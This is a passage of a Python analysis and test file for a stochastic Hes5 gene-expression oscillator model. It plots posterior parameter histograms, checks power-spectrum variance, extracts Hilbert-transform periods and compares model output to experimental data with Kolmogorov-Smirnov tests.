plt.xlabel("Transcription rate \n [1/min]")
# locator_params does not accept labelsize; tick label size is set via tick_params
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.gca().tick_params(axis='y', labelsize = 'small')
plt.gca().set_ylim(0,1.0)
plt.xticks([-1,0,1], [r'$10^{-1}$',r'$10^0$',r'$10^1$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,np.log10(40),20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,np.log10(40))
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1], [r'$10^0$',r'$10^1$'])
plt.xlabel("Translation rate \n [1/min]")
plt.gca().set_ylim(0,2.0)
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().set_xlim(0,12)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = time_delay_bins)
plt.gca().set_xlim(5,40)
# plt.gca().set_ylim(0,0.035)
plt.gca().set_ylim(0,0.04)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel(" Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
# plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','LNA_outliers.pdf'))
#what happens in the cases when the CLE has higher std than the LNA?
outlier_mask = error_ratios<0.9
outlier_samples = posterior_samples[outlier_mask]
outlier_results = posterior_results[outlier_mask]
print('outlier coherences are')
print(outlier_results[:,3])
outlier_samples[:,2]/=10000
print('minimal outlier coherence is')
print(np.min(outlier_results[:,3]))
print('posterior samples with coherence above 0.5')
print(np.sum(posterior_results[:,3]>0.5))
data_frame = pd.DataFrame( data = outlier_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,np.log10(60.0),20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,np.log10(60.0))
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
# locator_params does not accept labelsize; tick label size is set via tick_params
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.gca().tick_params(axis='y', labelsize = 'small')
plt.gca().set_ylim(0,1.0)
plt.xticks([-1,0,1], [r'$10^{-1}$',r'$10^0$',r'$10^1$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,np.log10(40),20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,np.log10(40))
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1], [r'$10^0$',r'$10^1$'])
plt.xlabel("Translation rate \n [1/min]")
plt.gca().set_ylim(0,2.0)
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().set_xlim(0,12)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = time_delay_bins)
plt.gca().set_xlim(5,40)
# plt.gca().set_ylim(0,0.035)
plt.gca().set_ylim(0,0.04)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel(" Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
# plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','LNA_other_outliers.pdf'))
def xest_calculate_variance(self):
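# Hand-evaluate the LNA power spectrum for one posterior sample and
# integrate it to recover the variance, as a cross-check of the library
# routines used elsewhere.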
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
# first: calculate theoretical standard deviation
# then: compare to model result
sample = posterior_samples[5]
sample_result = posterior_results[5]
mRNA_degradation_rate = np.log(2)/30
protein_degradation_rate = np.log(2)/90
basal_transcription_rate = sample[0]
translation_rate = sample[1]
repression_threshold = sample[2]
transcription_delay = sample[3]
hill_coefficient = sample[4]
actual_frequencies = np.linspace(0,0.01,1000)
pi_frequencies = actual_frequencies*2*np.pi
steady_state_mrna, steady_state_protein = hes5.calculate_steady_state_of_ode( repression_threshold = float(repression_threshold),
hill_coefficient = hill_coefficient,
mRNA_degradation_rate = mRNA_degradation_rate,
protein_degradation_rate = protein_degradation_rate,
basal_transcription_rate = basal_transcription_rate,
translation_rate = translation_rate)
steady_state_hill_function_value = 1.0/(1.0 + np.power( steady_state_protein/float(repression_threshold),
hill_coefficient ))
steady_state_hill_derivative = -hill_coefficient*np.power(steady_state_protein/float(repression_threshold),
hill_coefficient - 1)/(repression_threshold*
np.power(1.0+np.power(steady_state_protein/float(repression_threshold),
hill_coefficient),2))
# steady_state_hill_derivative = -hill_coefficient/float(repression_threshold)*np.power(
# 1.0 + steady_state_protein/float(repression_threshold),
# hill_coefficient)
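# The expression below is the LNA power spectrum of the delayed negative
# feedback model. In symbols, with basal transcription rate a, translation
# rate p, degradation rates mu_m and mu_p, delay tau, Hill function f and
# steady states M*, P*:
# S(w) = [ p^2 ( a f(P*) + mu_m M* ) + ( w^2 + mu_m^2 )( p M* + mu_p P* ) ]
# / [ ( -w^2 + mu_p mu_m - a p f'(P*) cos(w tau) )^2
# + ( ( mu_p + mu_m ) w + a p f'(P*) sin(w tau) )^2 ]
# The variance is then recovered as (1/2pi) times the integral of S(w) over
# angular frequency, which is what the trapezoidal integration below does.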
power_spectrum_values = ( translation_rate*translation_rate*
( basal_transcription_rate * steady_state_hill_function_value +
mRNA_degradation_rate*steady_state_mrna)
+
( np.power(pi_frequencies,2) + mRNA_degradation_rate*mRNA_degradation_rate)*
( translation_rate*steady_state_mrna + protein_degradation_rate*steady_state_protein)
)/(np.power(- np.power(pi_frequencies,2) +
protein_degradation_rate*mRNA_degradation_rate
- basal_transcription_rate*translation_rate*steady_state_hill_derivative*
np.cos(pi_frequencies*transcription_delay),2)
+
np.power((protein_degradation_rate+mRNA_degradation_rate)*
pi_frequencies +
basal_transcription_rate*translation_rate*steady_state_hill_derivative*
np.sin(pi_frequencies*transcription_delay), 2)
)
power_spectrum = np.vstack((pi_frequencies, power_spectrum_values)).transpose()
integral = np.trapz(power_spectrum[:,1], power_spectrum[:,0])
power_spectrum_intercept = integral
variance = 0.5/np.pi*power_spectrum_intercept
relative_standard_deviation = np.sqrt(variance)/steady_state_protein
print('variance over mean over real value')
print((power_spectrum_intercept/steady_state_protein)/sample_result[1])
print('std over mean')
print((np.sqrt(power_spectrum_intercept)/steady_state_protein)/sample_result[1])
def xest_get_hilbert_periods_at_representative_model_parameter(self):
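# For one representative posterior sample (coherence between 0.15 and 0.2),
# simulate 200 Langevin traces and compare the period inferred from the
# power spectrum against the distribution of individual cycle lengths
# extracted from the Hilbert phase of each trace.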
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,3]>0.15,
model_results[:,3]<0.2))))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
sample = posterior_samples[2]
these_mrna_traces, these_protein_traces = hes5.generate_multiple_langevin_trajectories( 200, # number_of_trajectories
1500*5, #duration
sample[2], #repression_threshold,
sample[4], #hill_coefficient,
np.log(2)/30, #mRNA_degradation_rate,
np.log(2)/90, #protein_degradation_rate,
sample[0], #basal_transcription_rate,
sample[1], #translation_rate,
sample[3], #transcription_delay,
10, #initial_mRNA,
sample[2], #initial_protein,
1000)
this_power_spectrum,this_coherence, this_period = hes5.calculate_power_spectrum_of_trajectories(these_protein_traces)
# get first set of periods
all_periods = hes5.get_period_measurements_from_signal(these_protein_traces[:,0],
these_protein_traces[:,1])
# and now add the rest
for trace in these_protein_traces[:,1:].transpose():
these_periods = hes5.get_period_measurements_from_signal(these_protein_traces[:,0], trace)
all_periods = np.hstack((all_periods, these_periods))
print(all_periods)
plt.figure(figsize = (6.5,2.5))
plt.subplot(121)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1])
plt.axvline(1/this_period, color = 'purple')
plt.xlim(0,0.01)
plt.xlabel('Frequency [1/min]')
plt.ylabel('Power')
plt.title('Period: ' + '{:.2f}'.format(this_period/60) + 'h, Coherence: ' + '{:.2f}'.format(this_coherence))
plt.subplot(122)
plt.hist(all_periods/60, range = (0,10), density = True, edgecolor = 'black')
plt.axvline(this_period/60, color = 'purple')
# plt.axvline(np.mean(all_periods)/60, color = 'black')
plt.xlabel('Period [h]')
# plt.ylim(0,0.0001)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'representative_hilbert_periods.pdf'))
def xest_kolmogorov_smirnov_on_period_and_stdev(self):
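# Two-sample Kolmogorov-Smirnov comparison of model and experiment, once
# for the relative standard deviation of expression and once for the
# Hilbert-derived periods (simulated periods of 12 h or more are excluded);
# boxplots annotated with the K-S statistic and p-value are drawn above the
# corresponding empirical cumulative distributions.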
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
experimental_periods = np.loadtxt(os.path.join(os.path.dirname(__file__), 'data',
'experimental_periods.csv'))
experimental_stdevs = np.loadtxt(os.path.join(os.path.dirname(__file__), 'data',
'experimental_stdevs.csv'))
simulated_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
'shortened_posterior_hilbert_periods_per_cell_one_sample.npy'))
real_simulated_periods = simulated_periods[simulated_periods<(12.0*60)]
simulated_stdevs = posterior_results[:,1]
print(experimental_periods)
print(experimental_stdevs)
period_stats = scipy.stats.ks_2samp(experimental_periods, real_simulated_periods/60)
print('period kolmogorov-smirnov test is')
print(period_stats)
stdev_stats = scipy.stats.ks_2samp(experimental_stdevs, simulated_stdevs)
print('stdev kolmogorov-smirnov test is')
print(stdev_stats)
plt.figure(figsize = [6.5,4.5])
plt.subplot(221)
sns.boxplot(data = [simulated_stdevs, experimental_stdevs])
plt.xticks([0,1], ['Model', 'Experiment'])
plt.text(0.25,0.2, 'K-S-value: ' + '{:.2f}'.format(stdev_stats[0]) +
'\np-value: ' + '{:.2f}'.format(stdev_stats[1]), fontsize = 8)
plt.ylabel('Stdev')
plt.subplot(222)
sns.boxplot(data = [real_simulated_periods/60, experimental_periods])
plt.xticks([0,1], ['Model', 'Experiment'])
# plt.axhline(12)
plt.text(0.25,10, 'K-S-value: ' + '{:.2f}'.format(period_stats[0]) +
'\np-value: ' + '{:.2e}'.format(period_stats[1]), fontsize = 8)
plt.ylabel('Period [h]')
simulated_stdevs.sort()
experimental_stdevs.sort()
real_simulated_periods.sort()
experimental_periods.sort()
print('number of experimental periods:')
number_of_experimental_periods = len(experimental_periods)
print(len(experimental_periods))
print('number of real_simulated_periods')
number_of_simulated_periods = len(real_simulated_periods)
print(len(real_simulated_periods))
print('product over sum')
print(number_of_experimental_periods*number_of_simulated_periods/(number_of_experimental_periods+
number_of_simulated_periods))
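# n*m/(n+m) is the effective sample size entering the asymptotic
# distribution of the two-sample K-S statistic, which is presumably why it
# is reported here.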
# plt.figure(figsize = [6.5,2.5])
plt.subplot(223)
plt.step(simulated_stdevs, (np.arange(simulated_stdevs.size)+1.0)/simulated_stdevs.size, label = "Model")
plt.step(experimental_stdevs, (np.arange(experimental_stdevs.size)+1.0)/experimental_stdevs.size, label = "Experiment")
plt.legend(loc='lower right')
plt.xlabel('Stdev')
plt.ylabel('Cumulative probability')
plt.subplot(224)
plt.step(real_simulated_periods/60, (np.arange(real_simulated_periods.size)+1.0)/real_simulated_periods.size)
plt.step(experimental_periods, (np.arange(experimental_periods.size)+1.0)/experimental_periods.size)
# plt.axhline(12)
plt.xlabel('Period [h]')
plt.ylabel('Cumulative probability')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','Model_data_period_and_stdev_distribution_comparison.pdf'))
# plt.tight_layout()
# plt.savefig(os.path.join(os.path.dirname(__file__),
# 'output','Kolmogoriv_w_cumulative_plotted.pdf'))
def xest_get_shortened_posterior_hilbert_period_distribution_smoothed_per_cell(self):
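# This and the following xest_get_*hilbert_period* variants follow one
# pattern: select the posterior, extract Hilbert-phase periods at every
# accepted parameter point (optionally smoothed, per cell, or with a single
# sample per point), save the raw periods, and plot their histogram with a
# 3.2 h reference period marked as a vertical line.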
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples, measurement_interval = 12*60,
smoothen = True, per_cell = True)
np.save(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods_per_cell'), hilbert_periods)
# hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
# 'shortened_posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods_per_cell.pdf'))
def xest_get_shortened_posterior_hilbert_period_distribution_smoothed(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
# hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples, measurement_interval = 12*60,
# smoothen = True)
# np.save(os.path.join(os.path.dirname(__file__), 'output',
# 'shortened_smoothened_posterior_hilbert_periods'), hilbert_periods)
hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,13), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods.pdf'))
def xest_get_shortened_smoothened_posterior_hilbert_period_distribution_one_sample(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
# hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples,
# measurement_interval = 12*60,
# per_cell = True,
# smoothen = True,
# samples_per_parameter_point = 1)
# np.save(os.path.join(os.path.dirname(__file__), 'output',
# 'shortened_smoothened_posterior_hilbert_periods_per_cell_one_sample'), hilbert_periods)
hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods_per_cell_one_sample.npy'))
hilbert_periods = hilbert_periods[hilbert_periods<10*60]
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods_per_cell_one_sample.pdf'))
def xest_get_shortened_posterior_hilbert_period_distribution(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'data',
# 'sampling_results_extended')
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_repeated')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples, measurement_interval = 12*60)
np.save(os.path.join(os.path.dirname(__file__), 'output',
'shortened_repeated_posterior_hilbert_periods'), hilbert_periods)
# hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
# 'shortened_posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'shortened_posterior_hilbert_periods.pdf'))
def xest_get_shortened_posterior_hilbert_period_distribution_per_cell(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'data',
# 'sampling_results_extended')
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_repeated')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples, measurement_interval = 12*60,
per_cell = True)
np.save(os.path.join(os.path.dirname(__file__), 'output',
'repeated_shortened_posterior_hilbert_periods_per_cell'), hilbert_periods)
# hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
# 'shortened_posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'shortened_posterior_hilbert_periods_per_cell.pdf'))
def xest_get_posterior_hilbert_period_distribution_per_cell(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples, per_cell = True)
np.save(os.path.join(os.path.dirname(__file__), 'output',
'posterior_hilbert_periods_per_cell'), hilbert_periods)
# hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
# 'posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'posterior_hilbert_periods_per_cell.pdf'))
def xest_get_posterior_hilbert_period_distribution(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
# hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples)
# np.save(os.path.join(os.path.dirname(__file__), 'output',
# 'posterior_hilbert_periods'), hilbert_periods)
hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
'posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'posterior_hilbert_periods.pdf'))
def xest_in_silico_power_spectrum(self):
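# Sanity check of the power spectrum pipeline on synthetic data: 300 traces
# of a 220 min sinusoid buried in uniform noise should produce a spectral
# peak near a frequency of 1/220 per minute.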
time_points = np.linspace(0,20000,10000)
in_silico_data = np.zeros((len(time_points),301))
in_silico_data[:,0] = time_points
for trace_index in range(1,301):
signal_values = np.sin(2*np.pi/220*time_points) + 10*np.random.rand(len(time_points))
in_silico_data[:, trace_index] = signal_values
this_power_spectrum,this_coherence, this_period = hes5.calculate_power_spectrum_of_trajectories(in_silico_data)
plt.figure(figsize = (6.5,2.5))
# plt.subplot(121)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1])
plt.xlim(0,0.01)
plt.xlabel('Frequency [1/min]')
plt.ylabel('Power')
plt.title('Period: ' + '{:.2f}'.format(this_period/60) + 'h, Coherence: ' + '{:.2f}'.format(this_coherence))
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'in_silico_power_spectrum.pdf'))
def xest_try_hilbert_transform(self):
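# Step-by-step demonstration of Hilbert-based period extraction: the phase
# of the analytic signal is computed for (i) a clean sinusoid, (ii) the
# same sinusoid with added noise, and (iii) a simulated Langevin trace,
# both raw and Savitzky-Golay smoothed; periods are read off as the
# intervals between positive-to-negative phase crossings, and the results
# are asserted to match hes5.get_period_measurements_from_signal.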
time_points = np.linspace(0,100,10000)
signal_values = np.sin(2*np.pi/1.42*time_points)+10
# time_points = np.linspace(0,15,100)
# signal_values = np.sin(2*np.pi/2*time_points)
analytic_signal = scipy.signal.hilbert(signal_values - np.mean(signal_values))
# analytic_signal = scipy.signal.hilbert(signal_values)
phase = np.angle(analytic_signal)
print(np.signbit(phase).astype(int))
#this will find the index just before zero-crossings from plus to minus
phase_reset_indices = np.where(np.diff(np.signbit(phase).astype(int))>0)
phase_reset_times = time_points[phase_reset_indices]
extracted_periods = np.diff(phase_reset_times)
print(extracted_periods)
print(np.mean(extracted_periods))
plt.figure(figsize = (4,2.5))
plt.plot(time_points, signal_values, label = 'signal')
plt.plot(time_points, phase, label = 'phase')
plt.vlines(phase_reset_times, -4,4, color = 'black')
plt.xlim(0,20)
plt.xlabel("Time")
plt.ylabel("Amplitude")
plt.tight_layout()
plt.legend()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','initial_hilbert_test.pdf'))
plt.figure(figsize = (4,2.5))
signal_values = signal_values + np.random.rand(len(signal_values))
# analytic_signal = scipy.signal.hilbert(signal_values)
analytic_signal = scipy.signal.hilbert(signal_values - np.mean(signal_values))
phase = np.angle(analytic_signal)
phase_reset_indices = np.where(np.diff(np.signbit(phase).astype(int))>0)
phase_reset_times = time_points[phase_reset_indices]
extracted_periods = np.diff(phase_reset_times)
print(extracted_periods)
print(np.mean(extracted_periods))
plt.plot(time_points, signal_values, label = 'signal', lw = 0.1)
plt.plot(time_points, phase, label = 'phase', lw = .1)
plt.vlines(phase_reset_times, -1,1, color = 'black', zorder = 10, lw = .1)
plt.xlabel("Time")
plt.ylabel("Amplitude")
plt.xlim(0,20)
plt.tight_layout()
plt.legend()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','initial_hilbert_test2.pdf'))
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,3]>0.12,
model_results[:,3]<0.17))))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
sample = posterior_samples[2]
these_traces = hes5.generate_langevin_trajectory( 1500*5, #duration
sample[2], #repression_threshold,
sample[4], #hill_coefficient,
np.log(2)/30, #mRNA_degradation_rate,
np.log(2)/90, #protein_degradation_rate,
sample[0], #basal_transcription_rate,
sample[1], #translation_rate,
sample[3], #transcription_delay,
10, #initial_mRNA,
sample[2], #initial_protein,
1000)
plt.figure(figsize = (6.5,2.5))
plt.subplot(121)
signal_values = these_traces[:,2]
time_points = these_traces[:,0]
